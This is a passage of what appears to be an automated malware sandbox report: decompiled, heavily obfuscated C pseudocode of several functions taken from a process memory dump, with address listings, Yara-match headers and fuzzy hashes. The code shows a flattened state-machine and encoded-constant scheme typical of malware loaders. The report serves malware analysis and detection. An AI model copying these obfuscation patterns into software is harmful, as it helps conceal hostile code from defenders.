				_v376 = _v376 * 0x6b;
				_v376 = _v376 >> 8;
				_v376 = _v376 ^ 0x00409983;
				_v340 = 0xeafe9b;
				_v340 = _v340 | 0x1be7931a;
				_v340 = _v340 / _t380;
				_v340 = _v340 ^ 0x007842c4;
				_v292 = 0xb0530f;
				_v292 = _v292 << 0xa;
				_v292 = _v292 ^ 0xc14db39e;
				_v288 = 0x51afd8;
				_v288 = _v288 + 0xffff1444;
				_v288 = _v288 ^ 0x0053892b;
				_v300 = 0x659e5;
				_v300 = _v300 + 0xffffd736;
				_v300 = _v300 ^ 0x00069f22;
				_v320 = 0x400a9d;
				_v320 = _v320 + 0xbe72;
				_v320 = _v320 + 0xffffedb0;
				_v320 = _v320 ^ 0x00466b5a;
				_v352 = 0xd7c1d3;
				_v352 = _v352 | 0x43544fa1;
				_v352 = _v352 + 0xf105;
				_v352 = _v352 ^ 0x43de8af9;
				_v328 = 0x7c4df2;
				_v328 = _v328 + 0xffff5764;
				_v328 = _v328 + 0x5d13;
				_v328 = _v328 ^ 0x0078d700;
				_v308 = 0x886a66;
				_v308 = _v308 + 0xffffb9a9;
				_v308 = _v308 ^ 0x0083c87a;
				_v344 = 0x372a1f;
				_v344 = _v344 >> 0xe;
				_v344 = _v344 + 0xffff2200;
				_v344 = _v344 ^ 0xfffac0df;
				_v296 = 0xe8ac11;
				_v296 = _v296 * 0x24;
				_v296 = _v296 ^ 0x20bd2906;
				_v304 = 0xc63cda;
				_v304 = _v304 * 0x18;
				_v304 = _v304 ^ 0x1295b197;
				_v332 = 0xe4d16;
				_v332 = _v332 + 0x4e9b;
				_v332 = _v332 >> 0xd;
				_v332 = _v332 ^ 0x0005dbab;
				_v372 = 0x45ead6;
				_v372 = _v372 + 0xffffe00c;
				_v372 = _v372 | 0x2bf1f08a;
				_v372 = _v372 ^ 0x2bf477f7;
				_v360 = 0x221565;
				_v360 = _v360 >> 2;
				_v360 = _v360 + 0xffffd8ea;
				_v360 = _v360 ^ 0x0006f076;
				_v312 = 0x4ed877;
				_v312 = _v312 << 1;
				_v312 = _v312 ^ 0x00935492;
				_v404 = 0x8469bf;
				_v404 = _v404 ^ 0x075bbf41;
				_v404 = _v404 | 0x28bf3f30;
				_t381 = 0x7e;
				_push("true");
				_v404 = _v404 * 0x49;
				_v404 = _v404 ^ 0xaff6c928;
				_v396 = 0x1bbe4c;
				_v396 = _v396 / _t381;
				_v396 = _v396 + 0xffffcd97;
				_pop(_t382);
				_v396 = _v396 * 0x38;
				_v396 = _v396 ^ 0x0009bf96;
				_v316 = 0x795385;
				_v316 = _v316 | 0x4718ac15;
				_v316 = _v316 >> 9;
				_v316 = _v316 ^ 0x0025e58d;
				_v324 = 0x70fc4d;
				_v324 = _v324 + 0x3f88;
				_v324 = _v324 + 0xcd5b;
				_v324 = _v324 ^ 0x007a737b;
				_v364 = 0xf2bf60;
				_v364 = _v364 * 0x7e;
				_v364 = _v364 / _t382;
				_v364 = _v364 ^ 0x01c559c7;
				_v336 = 0xcb080e;
				_v336 = _v336 << 0xe;
				_v336 = _v336 ^ 0xc2002858;
				_v380 = 0x5b6f54;
				_v380 = _v380 | 0x2762fee8;
				_v380 = _v380 + 0xffff4494;
				_v380 = _v380 ^ 0x277b3211;
				_v400 = 0xb8b9c5;
				_v400 = _v400 + 0xb5f;
				_v400 = _v400 << 1;
				_v400 = _v400 << 0xd;
				_v400 = _v400 ^ 0x3147c5ea;
				_v356 = 0xab28bc;
				_v356 = _v356 ^ 0x8927fd9f;
				_v356 = _v356 | 0x2a302ed7;
				_v356 = _v356 ^ 0xabba2c68;
				_v392 = 0x4b8eaf;
				_v392 = _v392 << 9;
				_v392 = _v392 >> 6;
				_v392 = _v392 << 8;
				_v392 = _v392 ^ 0x5c793020;
				_v348 = 0xf3aa03;
				_v348 = _v348 + 0xffff1528;
				_v348 = _v348 ^ 0x7304fcf0;
				_v348 = _v348 ^ 0x73fb1ffb;
				_v388 = 0x3dd2bd;
				_v388 = _v388 | 0x311b3931;
				_v388 = _v388 + 0x59a2;
				_v388 = _v388 + 0x7e2f;
				_v388 = _v388 ^ 0x3140d78e;
				while(1) {
					L1:
					_t306 = 0xbbb7183;
					do {
						while(1) {
							L2:
							_t389 = _t337 - 0x80cc2ab;
							if(_t389 > 0) {
								break;
							}
							if(_t389 == 0) {
								_t321 = E001D4CF5( &_v268, _v404, _v396, _v316, _a24);
								_t387 =  &(_t387[3]);
								if(_t321 != 0) {
									_t379 = 0xf971f34;
									_t334 = 1;
								}
								_t337 = 0x2e35f5d;
								while(1) {
									L1:
									_t306 = 0xbbb7183;
									goto L2;
								}
							} else {
								if(_t337 == 0xad90c7) {
									_t323 = E001C84F0(_v292, _v288, _a16, _t385, _v300,  &_v284);
									_t387 =  &(_t387[4]);
									if(_t323 != 0) {
										_t337 = 0xf8f92a;
										while(1) {
											L1:
											_t306 = 0xbbb7183;
											goto L2;
										}
									}
								} else {
									if(_t337 == 0xf8f92a) {
										if(_v280 >= _v388) {
											_t325 = E001D1591( &_v284,  &_v276);
										} else {
											_t325 = E001CA3E7( &_v284);
										}
										_t384 = _t325;
										_t306 = 0xbbb7183;
										_t337 =  !=  ? 0xbbb7183 : 0xb88ce56;
										continue;
									} else {
										if(_t337 == 0x2e35f5d) {
											_t241 =  &_v324; // 0x466b5a
											E001CAE43(_v268,  *_t241, _v364);
											goto L11;
										} else {
											if(_t337 != 0x5f87054) {
												goto L35;
											} else {
												_t333 = E001E0370( &_v276, _v296, _t395, _v304, _v332,  *( *((intOrPtr*)( *0x1e5208 + 0x30)) + 0x40) & 0x0000ffff,  *( *((intOrPtr*)( *0x1e5208 + 0x30)) + 0x24) & 0x0000ffff, _v372,  &_v268,  &_v260, _t384, _v360,  *((intOrPtr*)( *0x1e5208 + 0x30)), _v312);
												_t387 =  &(_t387[0xb]);
												if(_t333 == 0) {
													_t379 = 0x9c17656;
													L11:
													_t337 = 0xb88ce56;
													while(1) {
														L1:
														_t306 = 0xbbb7183;
														goto L2;
													}
												} else {
													_t337 = 0x80cc2ab;
													while(1) {
														L1:
														_t306 = 0xbbb7183;
														goto L2;
													}
												}
											}
										}
									}
								}
							}
							L38:
							return _t334;
						}
						if(_t337 == 0x82450b3) {
							_t384 = 0;
							E001D365D(_v368,  &_v260, _v384, 0x100, _v376, _v340);
							_t387 =  &(_t387[4]);
							_t337 = 0xad90c7;
							_v276 = 0;
							_v272 = 0;
							_v284 = 0;
							_v280 = 0;
							goto L34;
						} else {
							if(_t337 == 0x9c17656) {
								_t339 =  *0x1e5208;
								_t310 =  *((intOrPtr*)( *((intOrPtr*)(_t339 + 0x30)) + 0x20));
								 *((intOrPtr*)(_t339 + 0x2c)) =  *((intOrPtr*)(_t339 + 0x2c)) + 1;
								_t365 =  *((intOrPtr*)(_t339 + 0x2c));
								 *((intOrPtr*)(_t339 + 0x30)) = _t310;
								if(_t310 == 0) {
									 *((intOrPtr*)(_t339 + 0x30)) =  *((intOrPtr*)(_t339 + 0x24));
								}
								if(_t365 >=  *((intOrPtr*)( *0x1e5208 + 0x10))) {
									 *( *0x1e5208 + 0x2c) =  *( *0x1e5208 + 0x2c) & 0x00000000;
								} else {
									_t337 = 0x82450b3;
									goto L1;
								}
							} else {
								if(_t337 == 0xb88ce56) {
									E001CAE43(_v284, _v336, _v380);
									E001CAE43(_t384, _v400, _v356);
									E001CAE43(_v276, _v392, _v348);
									_t337 = _t379;
									L34:
									_t306 = 0xbbb7183;
									goto L35;
								} else {
									if(_t337 != _t306) {
										goto L35;
									} else {
										_push(_t337);
										_t319 = E001C2C02(1, 0x40);
										_push(_v344);
										_push( &_v260);
										_push(0xb);
										_push(_v308);
										E001C4A97(_t319, _v328);
										_t387 =  &(_t387[6]);
										_t337 = 0x5f87054;
										while(1) {
											L1:
											_t306 = 0xbbb7183;
											goto L2;
										}
									}
								}
							}
						}
						goto L38;
						L35:
					} while (_t337 != 0xf971f34);
					goto L38;
				}
			}




























































                          0x001d89a2
                          0x001d89ac
                          0x001d89b3
                          0x001d89b5
                          0x001d89bc
                          0x001d89c3
                          0x001d89ca
                          0x001d89d1
                          0x001d89d8
                          0x001d89d9
                          0x001d89da
                          0x001d89df
                          0x001d89e7
                          0x001d89ea
                          0x001d89f9
                          0x001d89fb
                          0x001d8a02
                          0x001d8a03
                          0x001d8a07
                          0x001d8a0f
                          0x001d8a17
                          0x001d8a1f
                          0x001d8a27
                          0x001d8a2c
                          0x001d8a34
                          0x001d8a41
                          0x001d8a45
                          0x001d8a4a
                          0x001d8a52
                          0x001d8a5a
                          0x001d8a68
                          0x001d8a6c
                          0x001d8a74
                          0x001d8a7f
                          0x001d8a87
                          0x001d8a92
                          0x001d8a9d
                          0x001d8aa8
                          0x001d8ab3
                          0x001d8abb
                          0x001d8ac3
                          0x001d8acb
                          0x001d8ad3
                          0x001d8adb
                          0x001d8ae3
                          0x001d8aeb
                          0x001d8af3
                          0x001d8afb
                          0x001d8b03
                          0x001d8b0b
                          0x001d8b13
                          0x001d8b1b
                          0x001d8b23
                          0x001d8b2b
                          0x001d8b33
                          0x001d8b3b
                          0x001d8b43
                          0x001d8b4b
                          0x001d8b50
                          0x001d8b58
                          0x001d8b60
                          0x001d8b6d
                          0x001d8b71
                          0x001d8b79
                          0x001d8b86
                          0x001d8b8a
                          0x001d8b92
                          0x001d8b9a
                          0x001d8ba2
                          0x001d8ba7
                          0x001d8baf
                          0x001d8bb9
                          0x001d8bc1
                          0x001d8bc9
                          0x001d8bd1
                          0x001d8bd9
                          0x001d8bde
                          0x001d8be6
                          0x001d8bee
                          0x001d8bf6
                          0x001d8bfa
                          0x001d8c02
                          0x001d8c0a
                          0x001d8c12
                          0x001d8c21
                          0x001d8c22
                          0x001d8c24
                          0x001d8c28
                          0x001d8c30
                          0x001d8c40
                          0x001d8c44
                          0x001d8c51
                          0x001d8c52
                          0x001d8c56
                          0x001d8c5e
                          0x001d8c66
                          0x001d8c6e
                          0x001d8c73
                          0x001d8c7b
                          0x001d8c83
                          0x001d8c8b
                          0x001d8c93
                          0x001d8c9b
                          0x001d8ca8
                          0x001d8cb2
                          0x001d8cb6
                          0x001d8cbe
                          0x001d8cc6
                          0x001d8ccb
                          0x001d8cd3
                          0x001d8cdb
                          0x001d8ce3
                          0x001d8ceb
                          0x001d8cf3
                          0x001d8cfb
                          0x001d8d03
                          0x001d8d07
                          0x001d8d0c
                          0x001d8d14
                          0x001d8d1c
                          0x001d8d24
                          0x001d8d2c
                          0x001d8d34
                          0x001d8d3c
                          0x001d8d41
                          0x001d8d46
                          0x001d8d4b
                          0x001d8d5b
                          0x001d8d63
                          0x001d8d6b
                          0x001d8d73
                          0x001d8d7b
                          0x001d8d83
                          0x001d8d8b
                          0x001d8d93
                          0x001d8d9b
                          0x001d8da3
                          0x001d8da3
                          0x001d8da3
                          0x001d8da8
                          0x001d8da8
                          0x001d8da8
                          0x001d8da8
                          0x001d8dae
                          0x00000000
                          0x00000000
                          0x001d8db4
                          0x001d8f09
                          0x001d8f0e
                          0x001d8f13
                          0x001d8f17
                          0x001d8f1c
                          0x001d8f1c
                          0x001d8f24
                          0x001d8da3
                          0x001d8da3
                          0x001d8da3
                          0x00000000
                          0x001d8da3
                          0x001d8dba
                          0x001d8dc0
                          0x001d8ed5
                          0x001d8eda
                          0x001d8edf
                          0x001d8ee5
                          0x001d8da3
                          0x001d8da3
                          0x001d8da3
                          0x00000000
                          0x001d8da3
                          0x001d8da3
                          0x001d8dc6
                          0x001d8dcc
                          0x001d8e88
                          0x001d8e98
                          0x001d8e8a
                          0x001d8e8a
                          0x001d8e8a
                          0x001d8e9d
                          0x001d8ea6
                          0x001d8eab
                          0x00000000
                          0x001d8dd2
                          0x001d8dd8
                          0x001d8e63
                          0x001d8e6e
                          0x00000000
                          0x001d8dde
                          0x001d8de4
                          0x00000000
                          0x001d8dea
                          0x001d8e3a
                          0x001d8e3f
                          0x001d8e44
                          0x001d8e50
                          0x001d8e55
                          0x001d8e55
                          0x001d8da3
                          0x001d8da3
                          0x001d8da3
                          0x00000000
                          0x001d8da3
                          0x001d8e46
                          0x001d8e46
                          0x001d8da3
                          0x001d8da3
                          0x001d8da3
                          0x00000000
                          0x001d8da3
                          0x001d8da3
                          0x001d8e44
                          0x001d8de4
                          0x001d8dd8
                          0x001d8dcc
                          0x001d8dc0
                          0x001d9070
                          0x001d9079
                          0x001d9079
                          0x001d8f34
                          0x001d9012
                          0x001d9025
                          0x001d902a
                          0x001d902d
                          0x001d9034
                          0x001d903b
                          0x001d9042
                          0x001d9049
                          0x00000000
                          0x001d8f3a
                          0x001d8f40
                          0x001d8fd4
                          0x001d8fdd
                          0x001d8fe0
                          0x001d8fe3
                          0x001d8fe6
                          0x001d8feb
                          0x001d8ff0
                          0x001d8ff0
                          0x001d8ffb
                          0x001d9069
                          0x001d8ffd
                          0x001d8ffd
                          0x00000000
                          0x001d8ffd
                          0x001d8f46
                          0x001d8f4c
                          0x001d8fa5
                          0x001d8fb5
                          0x001d8fca
                          0x001d8fd0
                          0x001d9050
                          0x001d9050
                          0x00000000
                          0x001d8f4e
                          0x001d8f50
                          0x00000000
                          0x001d8f56
                          0x001d8f61
                          0x001d8f64
                          0x001d8f69
                          0x001d8f74
                          0x001d8f75
                          0x001d8f77
                          0x001d8f84
                          0x001d8f89
                          0x001d8f8c
                          0x001d8da3
                          0x001d8da3
                          0x001d8da3
                          0x00000000
                          0x001d8da3
                          0x001d8da3
                          0x001d8f50
                          0x001d8f4c
                          0x001d8f40
                          0x00000000
                          0x001d9055
                          0x001d9055
                          0x00000000
                          0x001d9061

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: R$ 0y\$/~$To[$X($ZkF{sz${sz
                          • API String ID: 0-4201736015
                          • Opcode ID: fef3d5d36a444225df4dcd1c0a2da3ec1371154add66f9bdbc47b24ca06d9228
                          • Instruction ID: f008f80851e089c49f978eb0321874ada6c3b9b8a61134892a650325d10d2470
                          • Opcode Fuzzy Hash: fef3d5d36a444225df4dcd1c0a2da3ec1371154add66f9bdbc47b24ca06d9228
                          • Instruction Fuzzy Hash: 18F14271508381DFC368CF65C985A5BBBE2FBD4748F10891EF69A86260E7B5C909CF42
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001C9824, Relevance: 9.0, Strings: 7, Instructions: 297COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 96%
                          			E001C9824() {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				void* _t327;
				intOrPtr _t341;
				intOrPtr _t347;
				void* _t349;
				void* _t350;
				signed int _t352;
				signed int _t353;
				signed int _t354;
				signed int _t355;
				signed int _t356;
				signed int _t357;
				signed int _t362;
				intOrPtr _t383;
				void* _t389;
				signed int* _t393;

				_t393 =  &_v152;
				_v16 = 0xf4fcbc;
				_v12 = 0xcc564a;
				_v8 = 0x1f44a7;
				_t350 = 0;
				_v4 = _v4 & 0;
				_v92 = 0xcfd7c7;
				_v92 = _v92 >> 0xb;
				_v92 = _v92 + 0xd422;
				_v92 = _v92 ^ 0x0000ee1c;
				_v64 = 0xd22180;
				_v64 = _v64 >> 3;
				_v64 = _v64 ^ 0x001a4430;
				_v60 = 0x8c1bcb;
				_v60 = _v60 * 0x39;
				_t389 = 0xd6d27c9;
				_v60 = _v60 ^ 0x1f323033;
				_v76 = 0x831fd4;
				_v76 = _v76 ^ 0x625d9212;
				_v76 = _v76 ^ 0xfff94b8d;
				_v76 = _v76 ^ 0x9d27c64b;
				_v104 = 0x10f543;
				_v104 = _v104 >> 5;
				_t352 = 3;
				_v104 = _v104 * 0x70;
				_v104 = _v104 << 1;
				_v104 = _v104 ^ 0x0076b4c0;
				_v36 = 0x4f3c88;
				_v36 = _v36 + 0x5323;
				_v36 = _v36 ^ 0x00472983;
				_v132 = 0x249af3;
				_v132 = _v132 << 3;
				_v132 = _v132 + 0xdef7;
				_v132 = _v132 | 0x4837824b;
				_v132 = _v132 ^ 0x4938a10b;
				_v116 = 0xde336f;
				_v116 = _v116 * 0x70;
				_v116 = _v116 | 0xaff76fdf;
				_v116 = _v116 ^ 0xefff5053;
				_v140 = 0x39e387;
				_v140 = _v140 >> 0xf;
				_v140 = _v140 | 0xd61d8ff0;
				_v140 = _v140 ^ 0xd8d48533;
				_v140 = _v140 ^ 0x0ec650e8;
				_v84 = 0xda673a;
				_v84 = _v84 + 0x3bc2;
				_v84 = _v84 << 0xe;
				_v84 = _v84 ^ 0xa8bcb544;
				_v52 = 0x79987e;
				_v52 = _v52 << 4;
				_v52 = _v52 ^ 0x07920e98;
				_v124 = 0xdab89c;
				_v124 = _v124 | 0x1f64e44b;
				_v124 = _v124 / _t352;
				_v124 = _v124 << 0xf;
				_v124 = _v124 ^ 0x2a2a3320;
				_v100 = 0x2e8e64;
				_v100 = _v100 + 0x279a;
				_v100 = _v100 ^ 0xd910bf7a;
				_v100 = _v100 + 0xffff7792;
				_v100 = _v100 ^ 0xd93d7a92;
				_v44 = 0x33eb7f;
				_v44 = _v44 | 0xf0ae93ea;
				_v44 = _v44 ^ 0xf0b1ffc7;
				_v152 = 0x6a71c3;
				_v152 = _v152 | 0xae1ef1ad;
				_v152 = _v152 ^ 0xf2a50ead;
				_v152 = _v152 << 0xc;
				_v152 = _v152 ^ 0xbff88a5a;
				_v68 = 0x3e4fcd;
				_v68 = _v68 + 0x6663;
				_v68 = _v68 ^ 0x0038ecf3;
				_v144 = 0xe881f;
				_t353 = 0x52;
				_v144 = _v144 / _t353;
				_t354 = 0x4c;
				_v144 = _v144 / _t354;
				_v144 = _v144 + 0xffff1bf7;
				_v144 = _v144 ^ 0xfff8babb;
				_v88 = 0x223694;
				_t355 = 0x75;
				_v88 = _v88 / _t355;
				_v88 = _v88 + 0x5d24;
				_v88 = _v88 ^ 0x0009c7d6;
				_v28 = 0xebbf2f;
				_v28 = _v28 + 0xffffaf63;
				_v28 = _v28 ^ 0x00ebd29d;
				_v80 = 0xc812ab;
				_v80 = _v80 + 0x96d7;
				_v80 = _v80 + 0xb4af;
				_v80 = _v80 ^ 0x00c2fb9a;
				_v48 = 0x7ee6e7;
				_t163 =  &_v48; // 0x7ee6e7
				_t356 = 0xa;
				_v48 =  *_t163 / _t356;
				_v48 = _v48 ^ 0x000128bb;
				_v136 = 0x4d965e;
				_v136 = _v136 + 0x947e;
				_v136 = _v136 + 0xffff529d;
				_v136 = _v136 ^ 0x66eabf86;
				_v136 = _v136 ^ 0x66adda57;
				_v56 = 0x578cb6;
				_v56 = _v56 << 5;
				_v56 = _v56 ^ 0x0aff5890;
				_v108 = 0x878f63;
				_v108 = _v108 << 5;
				_v108 = _v108 >> 0x10;
				_v108 = _v108 + 0x9435;
				_v108 = _v108 ^ 0x00053dff;
				_v24 = 0xa0bcae;
				_v24 = _v24 << 0xa;
				_v24 = _v24 ^ 0x82ff4e2b;
				_v148 = 0xc81f08;
				_v148 = _v148 + 0xffff6414;
				_v148 = _v148 + 0xffffeb30;
				_v148 = _v148 >> 0xc;
				_v148 = _v148 ^ 0x000c00be;
				_v96 = 0xf9f6b6;
				_v96 = _v96 << 0x10;
				_t357 = 0x4e;
				_v96 = _v96 * 0x2f;
				_v96 = _v96 ^ 0x3ff93bc2;
				_v96 = _v96 ^ 0x749da751;
				_v112 = 0x4ecc95;
				_v112 = _v112 | 0x05338e70;
				_v112 = _v112 + 0xe97c;
				_v112 = _v112 / _t357;
				_v112 = _v112 ^ 0x00151d97;
				_v120 = 0x5164d3;
				_v120 = _v120 + 0xa9f0;
				_v120 = _v120 + 0x9c4e;
				_v120 = _v120 + 0x4dd;
				_v120 = _v120 ^ 0x005479ba;
				_v128 = 0x513b04;
				_v128 = _v128 + 0xc212;
				_v128 = _v128 << 0xa;
				_v128 = _v128 ^ 0x3f5d72dd;
				_v128 = _v128 ^ 0x78a227d4;
				_v72 = 0x8b60f0;
				_v72 = _v72 << 6;
				_v72 = _v72 ^ 0x12fa78bf;
				_v72 = _v72 ^ 0x302b6153;
				_v32 = 0x8c29a0;
				_v32 = _v32 + 0x4cb4;
				_v32 = _v32 ^ 0x00871061;
				_v40 = 0x7031aa;
				_v40 = _v40 ^ 0x8728ba02;
				_v40 = _v40 ^ 0x875a71ec;
				while(1) {
					L1:
					while(1) {
						_t327 = 0xe709152;
						do {
							L3:
							if(_t389 == 0x57bf409) {
								E001CAE43( *((intOrPtr*)( *0x1e5210 + 0x10)), _v128, _v72);
								E001CAE43( *0x1e5210, _v32, _v40);
								_pop(_t362);
								_t389 = 0x64a8bf2;
								L14:
								_t383 =  *0x1e5210;
								_t327 = 0xe709152;
								goto L15;
							}
							if(_t389 == 0xace7a45) {
								E001D4827(_v20, _v96, _v104, _v112, _v120);
								L18:
								return _t350;
							}
							if(_t389 == 0xb56e1a5) {
								_push(_v68);
								_push(_v152);
								__eflags = E001DD96C(_v144, _v88,  &_v20, _v92, _v28, 0, E001DCD35(0x1c15e8, _v44, __eflags)) - _v64;
								_t362 = _v80;
								_t389 =  ==  ? 0xe709152 : 0x57bf409;
								E001D629F(_t362, _t332, _v48, _v136, _v56);
								_t393 =  &(_t393[0xa]);
								goto L14;
							}
							if(_t389 == 0xd6d27c9) {
								_push(_t362);
								_push(_t362);
								_t341 = E001D5212(0x2c);
								 *0x1e5210 = _t341;
								 *((intOrPtr*)(_t341 + 0x14)) = 0x4000;
								_t347 = E001D5212( *((intOrPtr*)( *0x1e5210 + 0x14)));
								_t383 =  *0x1e5210;
								_t393 =  &(_t393[4]);
								_t389 = 0xb56e1a5;
								_t362 =  *((intOrPtr*)(_t383 + 0x14)) + _t347;
								 *((intOrPtr*)(_t383 + 0x10)) = _t347;
								 *((intOrPtr*)(_t383 + 8)) = _t347;
								 *((intOrPtr*)(_t383 + 0x28)) = _t347;
								 *(_t383 + 0x24) = _t362;
								_t327 = 0xe709152;
								continue;
							}
							if(_t389 != _t327) {
								goto L15;
							}
							_t362 = _v60;
							_t349 = E001D07D9(_t362, _v20,  *((intOrPtr*)( *0x1e5210 + 0x10)), _v108, _v24, _v148,  *((intOrPtr*)(_t383 + 0x14)));
							_t393 =  &(_t393[5]);
							if(_t349 != _v76) {
								_t389 = 0x57bf409;
							} else {
								_t389 = 0xace7a45;
								_t350 = 1;
							}
							goto L1;
							L15:
							__eflags = _t389 - 0x64a8bf2;
						} while (__eflags != 0);
						goto L18;
					}
				}
			}
























































                          0x001c9824
                          0x001c982a
                          0x001c9837
                          0x001c9842
                          0x001c984e
                          0x001c9850
                          0x001c9857
                          0x001c985f
                          0x001c9864
                          0x001c986c
                          0x001c9874
                          0x001c987c
                          0x001c9881
                          0x001c9889
                          0x001c989b
                          0x001c989f
                          0x001c98a4
                          0x001c98ac
                          0x001c98b4
                          0x001c98bc
                          0x001c98c4
                          0x001c98cc
                          0x001c98d4
                          0x001c98de
                          0x001c98df
                          0x001c98e3
                          0x001c98e7
                          0x001c98ef
                          0x001c98fa
                          0x001c9905
                          0x001c9910
                          0x001c9918
                          0x001c991d
                          0x001c9925
                          0x001c992d
                          0x001c9935
                          0x001c9942
                          0x001c9946
                          0x001c994e
                          0x001c9956
                          0x001c995e
                          0x001c9963
                          0x001c996b
                          0x001c9973
                          0x001c997b
                          0x001c9983
                          0x001c998b
                          0x001c9990
                          0x001c9998
                          0x001c99a0
                          0x001c99a5
                          0x001c99ad
                          0x001c99b5
                          0x001c99c3
                          0x001c99c7
                          0x001c99cc
                          0x001c99d4
                          0x001c99dc
                          0x001c99e4
                          0x001c99ec
                          0x001c99f4
                          0x001c99fc
                          0x001c9a04
                          0x001c9a0c
                          0x001c9a14
                          0x001c9a1c
                          0x001c9a24
                          0x001c9a2c
                          0x001c9a31
                          0x001c9a39
                          0x001c9a41
                          0x001c9a49
                          0x001c9a53
                          0x001c9a61
                          0x001c9a66
                          0x001c9a70
                          0x001c9a75
                          0x001c9a7b
                          0x001c9a83
                          0x001c9a8b
                          0x001c9a97
                          0x001c9a9c
                          0x001c9aa2
                          0x001c9aaa
                          0x001c9ab2
                          0x001c9abd
                          0x001c9ac8
                          0x001c9ad3
                          0x001c9adb
                          0x001c9ae3
                          0x001c9aeb
                          0x001c9af3
                          0x001c9afb
                          0x001c9aff
                          0x001c9b04
                          0x001c9b0a
                          0x001c9b12
                          0x001c9b1a
                          0x001c9b22
                          0x001c9b2a
                          0x001c9b32
                          0x001c9b3a
                          0x001c9b42
                          0x001c9b47
                          0x001c9b4f
                          0x001c9b57
                          0x001c9b5c
                          0x001c9b61
                          0x001c9b69
                          0x001c9b71
                          0x001c9b7c
                          0x001c9b84
                          0x001c9b8f
                          0x001c9b97
                          0x001c9b9f
                          0x001c9ba7
                          0x001c9bac
                          0x001c9bb4
                          0x001c9bbc
                          0x001c9bc6
                          0x001c9bc7
                          0x001c9bcb
                          0x001c9bd3
                          0x001c9bdb
                          0x001c9be3
                          0x001c9beb
                          0x001c9bf9
                          0x001c9bfd
                          0x001c9c05
                          0x001c9c0d
                          0x001c9c15
                          0x001c9c1d
                          0x001c9c25
                          0x001c9c32
                          0x001c9c3a
                          0x001c9c42
                          0x001c9c47
                          0x001c9c4f
                          0x001c9c57
                          0x001c9c5f
                          0x001c9c64
                          0x001c9c6c
                          0x001c9c74
                          0x001c9c7f
                          0x001c9c8a
                          0x001c9c95
                          0x001c9ca0
                          0x001c9cab
                          0x001c9cb6
                          0x001c9cb6
                          0x001c9cbc
                          0x001c9cbc
                          0x001c9cc1
                          0x001c9cc1
                          0x001c9cc3
                          0x001c9e25
                          0x001c9e3e
                          0x001c9e44
                          0x001c9e45
                          0x001c9e4a
                          0x001c9e4a
                          0x001c9e50
                          0x00000000
                          0x001c9e50
                          0x001c9ccf
                          0x001c9e7a
                          0x001c9e85
                          0x001c9e8e
                          0x001c9e8e
                          0x001c9cdb
                          0x001c9d9e
                          0x001c9da7
                          0x001c9dec
                          0x001c9e00
                          0x001c9e07
                          0x001c9e0a
                          0x001c9e0f
                          0x00000000
                          0x001c9e0f
                          0x001c9ce7
                          0x001c9d45
                          0x001c9d46
                          0x001c9d49
                          0x001c9d4e
                          0x001c9d56
                          0x001c9d75
                          0x001c9d7a
                          0x001c9d80
                          0x001c9d83
                          0x001c9d8b
                          0x001c9d8d
                          0x001c9d90
                          0x001c9d93
                          0x001c9d96
                          0x001c9cbc
                          0x00000000
                          0x001c9cbc
                          0x001c9ceb
                          0x00000000
                          0x00000000
                          0x001c9d08
                          0x001c9d16
                          0x001c9d1b
                          0x001c9d22
                          0x001c9d2e
                          0x001c9d24
                          0x001c9d26
                          0x001c9d2b
                          0x001c9d2b
                          0x00000000
                          0x001c9e55
                          0x001c9e55
                          0x001c9e55
                          0x00000000
                          0x001c9e61
                          0x001c9cbc

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 3**$#S$$]$Sa+0$cf$|$~
                          • API String ID: 0-2081237789
                          • Opcode ID: 5998d6f3826ebbcabafd6ad102bd91d4491233abb7a98c47b384e2038446b9b7
                          • Instruction ID: db6a2fc83c85719843e3b5011ca0ec987af7c3a93fb77f4858c116a6898347ac
                          • Opcode Fuzzy Hash: 5998d6f3826ebbcabafd6ad102bd91d4491233abb7a98c47b384e2038446b9b7
                          • Instruction Fuzzy Hash: 67F101B15093809FD368CF65C58AA0BBBF1FBD4708F10891DF29A8A261D7B5C949CF46
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001D3043, Relevance: 9.0, Strings: 7, Instructions: 281COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 96%
                          			E001D3043() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				signed int _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				unsigned int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				void* _t313;
				void* _t319;
				short* _t321;
				void* _t329;
				void* _t332;
				signed int _t361;
				signed int _t362;
				signed int _t363;
				signed int _t364;
				signed int _t365;
				signed int _t366;
				signed int* _t369;

				_t369 =  &_v1164;
				_v1048 = 0x2d3a44;
				_v1048 = _v1048 + 0xffff0941;
				_t329 = 0x186cafe;
				_v1048 = _v1048 ^ 0x00270cf9;
				_v1144 = 0xb1e5f6;
				_v1144 = _v1144 << 0xe;
				_v1144 = _v1144 << 7;
				_v1144 = _v1144 >> 0xa;
				_v1144 = _v1144 ^ 0x002b5059;
				_v1152 = 0x705433;
